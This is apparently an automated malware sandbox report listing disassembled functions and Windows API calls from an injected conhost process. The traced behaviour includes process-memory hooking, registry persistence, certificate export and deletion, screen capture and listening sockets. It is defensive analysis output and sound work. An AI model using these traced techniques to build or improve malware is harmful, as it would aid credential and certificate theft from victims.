nspr4.dll, xrefs: 001B208E

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B69AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(001C2C3C,00000001,00000000,001B22ED,?,?,00000000), ref: 001B69B4
SetSecurityDescriptorDacl.ADVAPI32(001C2C3C,00000001,00000000,00000000,?,?,00000000), ref: 001B69C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 001B69DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 001B69F7
SetSecurityDescriptorSacl.ADVAPI32(001C2C3C,?,?,?,?,?,00000000), ref: 001B6A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 001B6A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 001B69D6

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B4B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B4B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B4B3F
GetLastError.KERNEL32(?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B4B45

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B4B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B4B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B4B8B

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

CloseHandle.KERNEL32(?), ref: 001B4BB6

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B7BF7, Relevance: 7.6, APIs: 5, Instructions: 108

APIs

Part of subcall function 001B7BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,001AC168,DB84D88A,?,?,?,001ABD76,00000000,00000000,00000004,?,?,001AC160), ref: 001B7BC7

VirtualProtectEx.KERNELBASE(000000FF,001AC160,0000001E,00000040,001C2360,001AC158,00000004,?,?,?,?,001ABE97,6A001C23,00000000), ref: 001B7C24
ReadProcessMemory.KERNELBASE(000000FF,001AC160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,001ABE97,6A001C23,00000000), ref: 001B7C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 001B7CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 001B7CED
VirtualProtectEx.KERNELBASE(000000FF,001AC160,0000001E,001C2360,001C2360,?,?,?,?,001ABE97,6A001C23,00000000,?,?,001AC160,001C2360), ref: 001B7D05

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 001B76B3

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 001B76E2

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

RegCloseKey.KERNEL32(?), ref: 001B7702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 001B7699

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AE89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 001AE8E0

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 001B76B3
Part of subcall function 001B768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 001B76E2
Part of subcall function 001B768E: RegCloseKey.KERNEL32(?), ref: 001B7702

Strings

Qanyodfyy, xrefs: 001AE8B7, 001AE8F2
SOFTWARE\Microsoft\Xyuxy, xrefs: 001AE8A7, 001AE8B2, 001AE8BE, 001AE8D9

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B6AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08), ref: 001B6AC3
GetLastError.KERNEL32(?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08,?,?,00000000), ref: 001B6AC9

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08), ref: 001B6AEF

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B49D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,001B2326,000000FF,001C2C08,?,?,00000000), ref: 001B49E2

Part of subcall function 001B6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08), ref: 001B6AC3
Part of subcall function 001B6AAA: GetLastError.KERNEL32(?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08,?,?,00000000), ref: 001B6AC9
Part of subcall function 001B6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08), ref: 001B6AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,001B2326,000000FF,001C2C08), ref: 001B4A0E

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

CloseHandle.KERNEL32(?), ref: 001B4A23

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,001B9EAB,?,?,00000004), ref: 001B7658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,001B9EAB,?,?,001B9EAB,?,?,00000004,?,00000004), ref: 001B7672
RegCloseKey.ADVAPI32(00000004,?,?,001B9EAB,?,?,00000004,?,00000004), ref: 001B7681

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B2BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 001B20C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 001B2105
Part of subcall function 001B20C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 001B2172
Part of subcall function 001B20C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 001B21A7
Part of subcall function 001B20C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 001B21DB
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 001B21FA
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 001B220C
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 001B221E
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 001B2230
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 001B2242
Part of subcall function 001B20C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 001B2254
Part of subcall function 001B20C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 001B228D
Part of subcall function 001B20C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 001B229C
Part of subcall function 001B20C4: InitializeCriticalSection.KERNEL32(001C400C,?,?,00000000), ref: 001B22C9
Part of subcall function 001B20C4: WSAStartup.WS2_32(00000202,?), ref: 001B22DF
Part of subcall function 001B20C4: CreateEventW.KERNEL32(001C2C30,00000001,00000000,00000000,?,?,00000000), ref: 001B2300
Part of subcall function 001B20C4: GetLengthSid.ADVAPI32(00000000,000000FF,001C2C08,?,?,00000000), ref: 001B2335
Part of subcall function 001B20C4: GetCurrentProcessId.KERNEL32(00000000,0129F7D0,00000000,?,?,00000000), ref: 001B2362

Part of subcall function 001B2A32: CloseHandle.KERNEL32(001C2AF0), ref: 001B2AF2

Part of subcall function 001AE959: CreateMutexW.KERNELBASE(001C2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,001A4E69,?,?,?,743C152E,00000002), ref: 001AE97F

CoInitializeEx.OLE32(00000000,00000002), ref: 001B2C62

Part of subcall function 001B9837: CoUninitialize.OLE32 ref: 001B9845

Part of subcall function 001BD486: CertOpenSystemStoreW.CRYPT32(00000000,001A4BBC,?,00000000,00000001), ref: 001BD4A1
Part of subcall function 001BD486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 001BD4BD
Part of subcall function 001BD486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 001BD4C9
Part of subcall function 001BD486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 001BD508
Part of subcall function 001BD486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 001BD538
Part of subcall function 001BD486: CharLowerW.USER32 ref: 001BD556
Part of subcall function 001BD486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 001BD561
Part of subcall function 001BD486: CertCloseStore.CRYPT32(?,00000000), ref: 001BD5EA

Part of subcall function 001BD5FB: CertOpenSystemStoreW.CRYPT32(00000000,001A4BBC,?,00000001,001B2C2A), ref: 001BD606
Part of subcall function 001BD5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,001B2C2A), ref: 001BD61F
Part of subcall function 001BD5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,001B2C2A), ref: 001BD62A
Part of subcall function 001BD5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,001B2C2A), ref: 001BD632
Part of subcall function 001BD5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,001B2C2A), ref: 001BD63E

Part of subcall function 001BA138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 001BA170

Strings

@, xrefs: 001B2C99

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AE959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(001C2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,001A4E69,?,?,?,743C152E,00000002), ref: 001AE97F

Part of subcall function 001AE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 001AE8E0

Part of subcall function 001B6B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001B6B0A
Part of subcall function 001B6B07: CloseHandle.KERNEL32(00000000), ref: 001B6B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 001AE95A, 001AE963, 001AE96C, 001AE977

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B9D6D, Relevance: 3.2, APIs: 2, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(001C3F24,00000000,7718F8FF), ref: 001B9D8F

Part of subcall function 001B7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,001B9E26,?,?), ref: 001B75AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 001B9E63

Part of subcall function 001B763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,001B9EAB,?,?,00000004), ref: 001B7658
Part of subcall function 001B763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,001B9EAB,?,?,001B9EAB,?,?,00000004,?,00000004), ref: 001B7672
Part of subcall function 001B763A: RegCloseKey.ADVAPI32(00000004,?,?,001B9EAB,?,?,00000004,?,00000004), ref: 001B7681

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B7711: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,001B9E78,?), ref: 001B771E
Part of subcall function 001B7711: RegCloseKey.KERNEL32(?), ref: 001B772E

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B1EE1, Relevance: 3.1, APIs: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 001B1F2C

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

lstrcmpiW.KERNEL32(?,?,?), ref: 001B1F56

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B7607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,001B9E26,?,?,?,001B75CD,?,?,00000000,00000004,?), ref: 001B761F
RegCloseKey.KERNEL32(?,?,001B75CD,?,?,00000000,00000004,?,?,?,?,001B9E26,?,?), ref: 001B762D

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B7711, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,001B9E78,?), ref: 001B771E
RegCloseKey.KERNEL32(?), ref: 001B772E

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001ABE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,001AC160,001C2360), ref: 001ABE72

Part of subcall function 001ABD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,001AC160,00000000,00000000,00000004,?,?,001AC160,001C2360), ref: 001ABD86
Part of subcall function 001ABD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,001AC160,001C2360), ref: 001ABD9C
Part of subcall function 001ABD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,001AC160,001AC160,?,?,001AC160,001C2360), ref: 001ABDB6

Part of subcall function 001B7BF7: VirtualProtectEx.KERNELBASE(000000FF,001AC160,0000001E,00000040,001C2360,001AC158,00000004,?,?,?,?,001ABE97,6A001C23,00000000), ref: 001B7C24
Part of subcall function 001B7BF7: ReadProcessMemory.KERNELBASE(000000FF,001AC160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,001ABE97,6A001C23,00000000), ref: 001B7C4B
Part of subcall function 001B7BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 001B7CC5
Part of subcall function 001B7BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 001B7CED
Part of subcall function 001B7BF7: VirtualProtectEx.KERNELBASE(000000FF,001AC160,0000001E,001C2360,001C2360,?,?,?,?,001ABE97,6A001C23,00000000,?,?,001AC160,001C2360), ref: 001B7D05

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B7595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,001B9E26,?,?), ref: 001B75AD

Part of subcall function 001B7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,001B9E26,?,?,?,001B75CD,?,?,00000000,00000004,?), ref: 001B761F
Part of subcall function 001B7607: RegCloseKey.KERNEL32(?,?,001B75CD,?,?,00000000,00000004,?,?,?,?,001B9E26,?,?), ref: 001B762D

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Non-executed Functions

Function 001BD486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,001A4BBC,?,00000000,00000001), ref: 001BD4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 001BD4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 001BD4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 001BD508

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 001BD538
CharLowerW.USER32 ref: 001BD556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 001BD561

Part of subcall function 001BD42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,001BD581,?,?,00000000), ref: 001BD43F

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

CertCloseStore.CRYPT32(?,00000000), ref: 001BD5EA

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BD5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,001A4BBC,?,00000001,001B2C2A), ref: 001BD606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,001B2C2A), ref: 001BD61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,001B2C2A), ref: 001BD62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,001B2C2A), ref: 001BD632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,001B2C2A), ref: 001BD63E

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B64FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 001B6506
bind.WS2_32(00000000,?,-0000001D), ref: 001B6526
listen.WS2_32(00000000,?), ref: 001B6535
#3.WS2_32(00000000), ref: 001B6540

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B67DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 001B67E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 001B6804
#3.WS2_32(00000000), ref: 001B680F

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AEA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 001AEA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 001AEA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 001AEA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 001AEA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 001AEA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 001AEA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 001AEA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 001AEAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 001AEAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 001AEAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 001AEB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 001AEB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 001AEB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 001AEB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 001AEB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 001AEB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 001AEB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 001AEB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 001AEB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 001AEC10
GetIconInfo.USER32(00000000,?), ref: 001AEC25
GetCursorPos.USER32(?), ref: 001AEC33
DrawIcon.USER32(?,?,?,?), ref: 001AED04

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 001AED85

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

FreeLibrary.KERNEL32(00000000), ref: 001AEE9C
FreeLibrary.KERNEL32(?), ref: 001AEEA6
FreeLibrary.KERNEL32(00000000), ref: 001AEEB0

Strings

GdipGetImageEncoders, xrefs: 001AEA8A
GdipDisposeImage, xrefs: 001AEA70
SelectObject, xrefs: 001AEB3A
GdiplusStartup, xrefs: 001AEA4B
GdiplusShutdown, xrefs: 001AEA56
DeleteObject, xrefs: 001AEB54
BitBlt, xrefs: 001AEB47
ole32.dll, xrefs: 001AEAE5
gdi32.dll, xrefs: 001AEB02
GdipCreateBitmapFromHBITMAP, xrefs: 001AEA63
CreateDCW, xrefs: 001AEB09
DeleteDC, xrefs: 001AEB61
CreateCompatibleDC, xrefs: 001AEB14
GdipSaveImageToStream, xrefs: 001AEA97
CreateStreamOnHGlobal, xrefs: 001AEAEC
DISPLAY, xrefs: 001AEBDE
CreateCompatibleBitmap, xrefs: 001AEB20
GetDeviceCaps, xrefs: 001AEB2D
gdiplus.dll, xrefs: 001AEA25
GdipGetImageEncodersSize, xrefs: 001AEA7D

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A54A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 001ADCA2: GetClassNameW.USER32(001E01CA,?,00000101), ref: 001ADCBD

GetWindowInfo.USER32(?,?), ref: 001A5515
IntersectRect.USER32(?,?,-00000114), ref: 001A5538
IntersectRect.USER32(?,?,-00000114), ref: 001A558E
GetDC.USER32(00000000), ref: 001A55D2
CreateCompatibleDC.GDI32(00000000), ref: 001A55E3
ReleaseDC.USER32(00000000,00000000), ref: 001A55ED
SelectObject.GDI32(00000000,?), ref: 001A5602
DeleteDC.GDI32(00000000), ref: 001A5610
TlsSetValue.KERNEL32(?), ref: 001A565B
EqualRect.USER32(?,?), ref: 001A5675
SaveDC.GDI32(00000000), ref: 001A5680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 001A56BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 001A56CD
RestoreDC.GDI32(00000000,?), ref: 001A56E4
SaveDC.GDI32(00000000), ref: 001A5706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001A571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 001A5735
RestoreDC.GDI32(00000000,?), ref: 001A5743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001A5756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 001A5766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 001A5778
TlsSetValue.KERNEL32(00000000), ref: 001A5792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A57B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 001A57CE
SelectObject.GDI32(00000000,?), ref: 001A57E4
DeleteDC.GDI32(00000000), ref: 001A57EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A5813

Part of subcall function 001A53C7: GdiFlush.GDI32 ref: 001A541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 001A5829

Strings

<, xrefs: 001A550B

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B2D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 001B85D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 001B85F5
Part of subcall function 001B85D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8608
Part of subcall function 001B85D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8630
Part of subcall function 001B85D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 001B8648
Part of subcall function 001B85D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8662
Part of subcall function 001B85D0: CloseHandle.KERNEL32(?), ref: 001B866B

Part of subcall function 001B8678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,001BC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 001B8689
